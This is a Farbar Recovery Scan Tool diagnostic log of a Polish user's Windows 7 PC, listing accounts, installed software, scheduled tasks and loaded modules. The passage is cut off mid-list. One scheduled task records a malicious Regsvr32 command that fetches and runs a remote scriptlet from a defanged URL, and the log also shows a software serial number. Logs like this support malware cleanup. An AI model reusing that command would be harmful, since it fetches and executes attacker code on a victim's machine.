Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-04-2017 01
Ran by Tomash (19-04-2017 09:30:14)
Running from D:\INSTALKI\Bezpieczenstwo
Windows 7 Home Premium Service Pack 1 (X64) (2016-08-22 16:08:41)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-1673507172-2206377428-1642603207-500 - Administrator - Disabled)
Guest (S-1-5-21-1673507172-2206377428-1642603207-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1673507172-2206377428-1642603207-1003 - Limited - Enabled)
Tomash (S-1-5-21-1673507172-2206377428-1642603207-1000 - Administrator - Enabled) => C:\Users\Tomash
UpdatusUser (S-1-5-21-1673507172-2206377428-1642603207-1001 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\uTorrent) (Version: 3.4.9.43295 - BitTorrent Inc.)
7-Zip 16.02 (x64) (HKLM\...\7-Zip) (Version: 16.02 - Igor Pavlov) 7-Zip 16.04 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1604-000001000000}) (Version: 16.04.00.0 - Igor Pavlov) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 25.0.0.134 - Adobe Systems Incorporated) Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated) Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.127 - Adobe Systems Incorporated) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated) Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated) Adobe Photoshop CS5 (HKLM-x32\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated) Advertising Center (x32 Version: 0.0.0.1 - Nero AG) Hidden Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{F4BF5F6B-F695-4762-AEB2-D095A4C34D89}) (Version: 1.5.17.25482 - Alcor Micro Corp.) Alcor Micro USB Card Reader (x32 Version: 1.5.17.25482 - Alcor Micro Corp.) 
Hidden ASUS USB2.0 UVC VGA WebCam (HKLM\...\ASUS USB2.0 UVC VGA WebCam) (Version: 5.8.53120.203 - Sonix) ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0001 - ASUS) Autodesk DWG TrueView 2014 (HKLM\...\DWG TrueView 2014) (Version: 19.1.18.0 - Autodesk) Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software) BGS Groundhog® Desktop GSIS version 1.7.0 (HKLM\...\{9EEC0C17-19B3-4A0C-93AE-2FFB2EE570AB}_is1) (Version: 1.7.0 - BGS) Brackets (HKLM-x32\...\{0ED76FF2-9370-4437-8C51-39F27DD0361B}) (Version: 1.8 - brackets.io) CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform) Counter-Strike 1.6 v43 (HKLM-x32\...\{1BD2212B-8287-4F33-A6DC-903D423AB814}_is1) (Version: v43 - CSSetti.pl) Defraggler (HKLM\...\Defraggler) (Version: 2.18 - Piriform) Deinstalator sterownika UFR II drukarki (HKLM\...\Canon UFR II Printer Driver) (Version: 5, 4, 0, 0 - Canon Inc.) Dexpot (HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Dexpot) (Version: 1.6.14 - Dexpot GbR) Dropbox (HKLM-x32\...\Dropbox) (Version: 23.4.19 - Dropbox, Inc.) Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden DWG TrueView 2014 (Version: 19.1.18.0 - Autodesk) Hidden e-pity 8.0.11 za rok 2016 (HKLM-x32\...\{80D8170E-5590-218-B9ED-E24E4C99A11D}_is1) (Version: 8.0.11 - e-file sp. z o.o. sp.k.) ETDWare PS/2-x64 7.0.5.9_WHQL (HKLM\...\Elantech) (Version: - ) f.lux (HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Flux) (Version: - ) Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.4 - ASUS) foobar2000 v1.3.4 (HKLM-x32\...\foobar2000) (Version: 1.3.4 - Peter Pawlowski) Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 8.2.1.6871 - Foxit Software Inc.) 
Free Alarm Clock (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 4.0.1.0 - Comfort Software Group) FreeCommander XE (HKLM-x32\...\FreeCommander XE_is1) (Version: - Marek Jasinski) FreeOCR v5.4 (HKLM-x32\...\freeocr_is1) (Version: - ) GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team) Git version 2.9.0 (HKLM\...\Git_is1) (Version: 2.9.0 - The Git Development Community) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden GPL Ghostscript (HKLM\...\GPL Ghostscript 9.19) (Version: 9.19 - Artifex Software Inc.) Handset WinDriver 1.02.03.00 (HKLM-x32\...\Handset WinDriver) (Version: 1.02.03.00 - Huawei technologies Co., Ltd.) HexEdit (HKLM-x32\...\{083EF76E-0760-4D7A-9508-0B88A3AF1889}) (Version: 4.0.0 - Expert Commercial Software Pty Ltd) ImageMagick 6.9.0-3 Q16 (64-bit) (2015-02-15) (HKLM\...\ImageMagick 6.9.0 Q16 (64-bit)_is1) (Version: 6.9.0 - ImageMagick Studio LLC) Inkscape 0.48.5 (HKLM-x32\...\Inkscape) (Version: 0.48.5 - ) IrfanView 64 (remove only) (HKLM\...\IrfanView64) (Version: 4.42 - Irfan Skiljan) Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation) Java SE Development Kit 8 Update 25 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180250}) (Version: 8.0.250.18 - Oracle Corporation) JPEGCrops 0.7.5 beta (HKLM-x32\...\{DEAD07C6-D070-43AB-A60D-D9ABE55E296D}_is1) (Version: - ) K-Lite Codec Pack 12.3.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.3.5 - KLCP) LibreOffice 5.2.0.4 (HKLM-x32\...\{8FA59B7B-1D26-408F-A798-BD11A65A68B9}) (Version: 5.2.0.4 - The Document Foundation) Malwarebytes (wersja 3.0.6.1469) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes) Microsoft .NET Framework 4.6 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.00081 - Microsoft Corporation) Microsoft Money Plus 
(HKLM-x32\...\Money2008b) (Version: 17 - Microsoft) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft 
Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) Minecraft 1.7.9 (auto update) (HKLM-x32\...\{4A619079-D0B3-475E-8DB3-BC83A3548F72}_is1) (Version: 1.7.9 (auto update) - Mojang) Mozilla Firefox 52.0.2 (x86 pl) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 pl)) (Version: 52.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0 - Mozilla) Mozilla Thunderbird 52.0.1 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 52.0.1 (x86 pl)) (Version: 52.0.1 - Mozilla) MyPublicWiFi 5.1 (HKLM-x32\...\{C08D782B-9281-406B-ABCE-326DA70B8A1F}_is1) (Version: - TRUE Software) NapiProjekt (2.2.0.2399) (HKLM-x32\...\NapiProjekt_is1) (Version: - ) Nero 9 Essentials (HKLM-x32\...\{49cb6ee2-8d59-4d1d-b051-177411c7b9ec}) (Version: - Nero AG) Node.js (HKLM\...\{F932CDD5-CC39-4E3C-B963-2299E09DE082}) (Version: 6.10.1 - Node.js Foundation) Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.2.2 - Notepad++ Team) NVIDIA 3D Vision Driver 320.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 320.00 - NVIDIA Corporation) NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.7 - NVIDIA Corporation) NVIDIA Graphics Driver 320.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 320.00 - NVIDIA Corporation) NVIDIA HD Audio Driver 1.3.24.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.24.2 - NVIDIA Corporation) NVIDIA PhysX System Software 9.12.1031 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.1031 - NVIDIA Corporation) NVIDIA Update 1.14.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.14.17 - NVIDIA Corporation) PDF Settings 
CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden PDFsam Basic (HKLM-x32\...\{AE22AC64-691E-4D7E-99CC-C517AE7F5F7D}) (Version: 3.20.2.0 - Andrea Vacondio) PLAY ONLINE (HKLM-x32\...\PLAY ONLINE) (Version: 21.005.11.14.264 - Huawei Technologies Co.,Ltd) Processing Modflow 5.3 (HKLM-x32\...\Processing Modflow 5.3) (Version: - ) QGIS 2.14.5 2.14.5 Essen (HKLM\...\QGIS 2.14.5) (Version: - QGIS Development Team) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0008 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6010 - Realtek Semiconductor Corp.) SafeZone Stable 3.55.2393.596 (x32 Version: 3.55.2393.596 - Avast Software) Hidden Samsung Printer Diagnostics (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.4.7.04 - Samsung Electronics Co., Ltd.) Samsung SCX-4300 Series (HKLM-x32\...\Samsung SCX-4300 Series) (Version: - Samsung Electronics CO.,LTD) Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.19.0 - Samsung Electronics Co., Ltd.) Scratch 2 Offline Editor (HKLM-x32\...\edu.media.mit.Scratch2Editor) (Version: 454 - Massachusetts Institute of Technology) Scratch 2 Offline Editor (x32 Version: 255 - Massachusetts Institute of Technology) Hidden ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation) Spotify (HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Spotify) (Version: 1.0.52.725.g943b26a8 - Spotify AB) SRS Premium Sound Control Panel (HKLM\...\{E5CF6B9C-3ABE-43C9-9413-AD5FFC98F049}) (Version: 1.8.2900 - SRS Labs, Inc.) Teigha File Converter (HKLM-x32\...\{1FF14C63-6F95-4CD7-8DBA-9FBC77A4062C}) (Version: 4.02.0 - ODA) Universal PS x64 Multi-Lingual driver (HKLM\...\{27A1B998-6172-459E-8BFA-BC313CEFD982}) (Version: 3.1.0.0 - KONICA MINOLTA) Vim 7.4 (self-installing) (HKLM\...\Vim 7.4) (Version: - ) Warcraft 3 (HKLM-x32\...\Warcraft 3_R.G. 
Mechanics_is1) (Version: - R.G. Mechanics, Panky)
WinSCP 5.9.4 (HKLM-x32\...\winscp3_is1) (Version: 5.9.4 - Martin Prikryl)
Wise Registry Cleaner 9.43 (HKLM-x32\...\Wise Registry Cleaner_is1) (Version: 9.43 - WiseCleaner.com, Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000_Classes\CLSID\{3faa4380-a399-11cf-a466-00805fe418f6}\InprocServer32 -> C:\Program Files\Autodesk\DWG TrueView 2014\en-US\dwgviewrficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\DWG TrueView 2014\dwgviewr.exe (Autodesk, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04EF5273-FC67-4BF7-A4BB-3D2569FB3E7D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-10] (Google Inc.)
Task: {19B090D7-001B-4F09-AEA7-A6204CADEA59} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-04] (AVAST Software)
Task: {3AB71BBE-0057-4D0A-A6CB-8ED15408E5D5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-23] (Dropbox, Inc.)
Task: {671CE90D-BF79-4C3E-A1DE-A8F5F0ABC436} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== scrobj.dll
Task: {6C9F01B6-BECC-43CD-8BE2-739CE2FBAC44} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-08-15] ()
Task: {80B3FEE7-E0B7-47B0-9E33-F05D726C5472} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-15] (Adobe Systems Incorporated)
Task: {899D8E49-5756-4C75-9B41-1E41668C3E09} - System32\Tasks\e-pity2016a_kwiecien => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe [2017-02-09] (e-file sp. z o.o. sp. k.)
Task: {9251BB20-C121-482F-AEEB-2730B2ACE435} - System32\Tasks\e-pity2016a_styczen => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe [2017-02-09] (e-file sp. z o.o. sp. k.)
Task: {9C19A80C-D3EC-4BEE-BDB0-F43FE242173A} - System32\Tasks\{AD4DACB7-BC30-4E87-B1E8-C5F61272F3FD} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="XM02-508X-MHAT-19WU-9Z3Z-0CH0-3U6E-85W5-MMHH-6647-1Z5L-7M8C-0U45-758P-0000"
Task: {B0DF613F-42BF-4CED-A9D6-7457A7ABFD4C} - System32\Tasks\SafeZone scheduled Autoupdate 1471882921 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
Task: {B233D4C7-4B93-430C-966E-2FE8B6BF8703} - System32\Tasks\{33FAF013-B0C3-4402-ADB7-89A951502DFB} => pcalua.exe -a C:\Users\Tomash\Downloads\KonSetup100.exe -d C:\Users\Tomash\Downloads
Task: {B8ED1AAE-4C26-47AF-8D4A-9AE28EBDEBA7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-04-13] (AVAST Software)
Task: {C6D1E418-DCD2-479F-9E92-242B6CF39C89} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: {EE66BEF9-9B83-47A1-B399-0782B2A0C19D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-10] (Google Inc.)
Task: {F248C58D-0297-43E9-8184-48E7EA3A5F97} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-08-23] (Dropbox, Inc.)
Task: {FBA3A804-5B14-4A96-AC0E-A46CEE585166} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {FBDE513F-985B-4358-A0B8-CC7320971199} - System32\Tasks\{AD88C4F6-17D5-441F-9D2B-6A3A880DED9D} => pcalua.exe -a "D:\INSTALKI\Office 2007\setup.exe" -d "D:\INSTALKI\Office 2007"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ============== 2016-08-22 19:12 - 2013-04-19 04:46 - 00087328 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2016-09-01 08:31 - 2008-02-06 01:54 - 00022016 _____ () C:\Windows\System32\sse1ml6.dll 2017-01-25 19:03 - 2013-04-03 15:09 - 00756224 _____ () C:\Program Files (x86)\MyPublicWiFi\PublicWiFiService.exe 2016-09-01 08:34 - 2016-08-17 13:43 - 00499000 ____N () C:\Windows\SysWOW64\spdsvc.exe 2017-04-18 22:11 - 2017-03-22 10:24 - 02271520 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll 2017-04-18 22:11 - 2017-03-23 19:40 - 02267600 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll 2017-04-04 17:11 - 2017-04-04 17:11 - 00162024 _____ () c:\Program Files\AVAST Software\Avast\x64\vaarclient.dll 2017-04-04 17:12 - 2017-04-04 17:12 - 00790544 _____ () C:\Program Files\AVAST Software\Avast\x64\ffl2.dll 2017-04-04 17:12 - 2017-04-04 17:12 - 00275776 _____ () c:\Program Files\AVAST Software\Avast\x64\StreamBack.dll 2016-08-22 18:58 - 2009-12-10 00:39 - 00402024 _____ () C:\Windows\system32\nvshell.dll 2016-11-27 19:55 - 2016-11-27 19:55 - 00230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll 2016-08-22 18:11 - 2016-08-22 18:11 - 00514048 _____ () C:\Program Files (x86)\PLAY ONLINE\PLAY ONLINE.exe 2016-08-22 18:11 - 2016-08-22 18:11 - 00246112 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\ouc.exe 2017-04-04 17:12 - 2017-04-04 17:12 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2017-04-04 17:12 - 2017-04-04 17:12 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll 2017-04-18 21:07 - 2017-04-18 21:07 - 06021752 _____ () C:\Program Files\AVAST Software\Avast\defs\17041812\algo.dll 2017-04-04 17:12 - 2017-04-04 17:12 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll 2017-04-04 17:12 - 2017-04-04 17:12 - 00230632 _____ () C:\Program Files\AVAST 
Software\Avast\streamback.dll 2016-08-22 18:19 - 2016-08-22 18:19 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2017-04-04 17:11 - 2017-04-04 17:11 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll 2017-04-15 21:58 - 2017-04-14 01:30 - 00870720 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_watchdog.dll 2017-04-15 21:58 - 2017-03-20 20:10 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd 2017-04-15 21:58 - 2017-03-20 20:10 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd 2017-04-15 21:58 - 2017-03-20 20:10 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00020824 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd 2017-04-15 21:58 - 2017-03-20 20:11 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd 2017-04-15 21:58 - 2017-03-20 20:10 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 01729360 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd 2017-04-15 21:58 - 2017-03-20 20:10 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd 2017-04-15 21:58 - 2017-03-20 20:11 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd 2017-04-15 21:58 - 2017-03-20 20:10 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll 2017-04-15 21:58 - 2017-03-20 20:13 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00022864 _____ () C:\Program Files 
(x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00060736 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00038712 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd 2017-04-15 21:58 - 2017-03-20 20:10 - 00392656 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll 2017-04-15 21:58 - 2017-03-20 20:13 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00392512 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00246608 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd 
2017-04-15 21:58 - 2017-04-14 01:33 - 00027488 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd 2017-04-15 21:58 - 2017-03-20 20:12 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00022336 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 00025432 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd 2017-04-15 21:58 - 2017-03-20 20:13 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 01826104 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd 2017-04-15 21:58 - 2017-03-20 20:11 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 01972024 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd 2017-04-15 21:58 - 2017-04-14 01:34 - 03928896 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00171336 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00042816 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00531264 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00133432 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00224064 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd 2017-04-15 21:58 - 2017-04-14 01:33 - 00207680 _____ () C:\Program Files 